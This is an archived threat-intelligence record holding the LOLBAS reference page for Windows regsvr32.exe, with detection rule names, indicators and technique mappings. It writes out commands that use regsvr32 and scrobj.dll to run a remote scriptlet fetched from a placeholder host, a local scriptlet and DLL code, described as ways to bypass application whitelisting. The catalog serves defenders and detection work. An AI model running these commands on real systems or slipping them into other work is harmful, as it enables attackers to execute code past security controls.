{
	"id": "cd8a4ab4-43c1-4484-a85d-17a16845edd0",
	"created_at": "2026-04-06T00:17:57.621105Z",
	"updated_at": "2026-04-10T03:21:58.704854Z",
	"deleted_at": null,
	"sha1_hash": "9ea93d13f2a56d384c55d8420daa491e708ae2b0",
	"title": "Regsvr32 on LOLBAS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 63300,
	"plain_text": "Regsvr32 on LOLBAS\r\nArchived: 2026-04-05 17:34:21 UTC\r\n.. /Regsvr32.exe\r\nUsed by Windows to register dlls\r\nPaths:\r\nC:\\Windows\\System32\\regsvr32.exe\r\nC:\\Windows\\SysWOW64\\regsvr32.exe\r\nResources:\r\nhttps://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/\r\nhttps://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md\r\nAcknowledgements:\r\nCasey Smith (@subtee)\r\nDetections:\r\nSigma: proc_creation_win_regsvr32_susp_parent.yml\r\nSigma: proc_creation_win_regsvr32_susp_child_process.yml\r\nSigma: proc_creation_win_regsvr32_susp_exec_path_1.yml\r\nSigma: proc_creation_win_regsvr32_network_pattern.yml\r\nSigma: net_connection_win_regsvr32_network_activity.yml\r\nSigma: dns_query_win_regsvr32_network_activity.yml\r\nSigma: proc_creation_win_regsvr32_flags_anomaly.yml\r\nSigma: file_event_win_net_cli_artefact.yml\r\nSplunk: detect_regsvr32_application_control_bypass.yml\r\nElastic: defense_evasion_suspicious_managedcode_host_process.toml\r\nElastic: execution_register_server_program_connecting_to_the_internet.toml\r\nIOC: regsvr32.exe retrieving files from Internet\r\nIOC: regsvr32.exe executing scriptlet (sct) files\r\nIOC: DotNet CLR libraries loaded into regsvr32.exe\r\nIOC: DotNet CLR Usage Log - regsvr32.exe.log\r\nAWL bypass\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\r\nPage 1 of 4\n\n1. Execute the specified remote .SCT script with scrobj.dll.\r\nregsvr32 /s /n /u /i:https://www.example.org/file.sct scrobj.dll\r\nUse case\r\nExecute code from remote scriptlet, bypass Application whitelisting\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.010: Regsvr32\r\nTags\r\nExecute: SCT\r\nExecute: Remote\r\n2. Execute the specified local .SCT script with scrobj.dll.\r\nregsvr32.exe /s /u /i:file.sct scrobj.dll\r\nUse case\r\nExecute code from scriptlet, bypass Application whitelisting\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.010: Regsvr32\r\nTags\r\nExecute: SCT\r\nExecute\r\n1. Execute the specified remote .SCT script with scrobj.dll.\r\nregsvr32 /s /n /u /i:https://www.example.org/file.sct scrobj.dll\r\nUse case\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\r\nPage 2 of 4\n\nExecute code from remote scriptlet, bypass Application whitelisting\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.010: Regsvr32\r\nTags\r\nExecute: SCT\r\nExecute: Remote\r\n2. Execute the specified local .SCT script with scrobj.dll.\r\nregsvr32.exe /s /u /i:file.sct scrobj.dll\r\nUse case\r\nExecute code from scriptlet, bypass Application whitelisting\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.010: Regsvr32\r\nTags\r\nExecute: SCT\r\n3. Execute code in a DLL. The code must be inside the exported function DllRegisterServer .\r\nregsvr32.exe /s file.dll\r\nUse case\r\nExecute DLL file\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.010: Regsvr32\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\r\nPage 3 of 4\n\nTags\r\nExecute: DLL\r\n4. Execute code in a DLL. The code must be inside the exported function DllUnRegisterServer .\r\nregsvr32.exe /u /s file.dll\r\nUse case\r\nExecute DLL file\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.010: Regsvr32\r\nTags\r\nExecute: DLL\r\nSource: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"
	],
	"report_names": [
		"Regsvr32"
	],
	"threat_actors": [],
	"ts_created_at": 1775434677,
	"ts_updated_at": 1775791318,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9ea93d13f2a56d384c55d8420daa491e708ae2b0.pdf",
		"text": "https://archive.orkl.eu/9ea93d13f2a56d384c55d8420daa491e708ae2b0.txt",
		"img": "https://archive.orkl.eu/9ea93d13f2a56d384c55d8420daa491e708ae2b0.jpg"
	}
}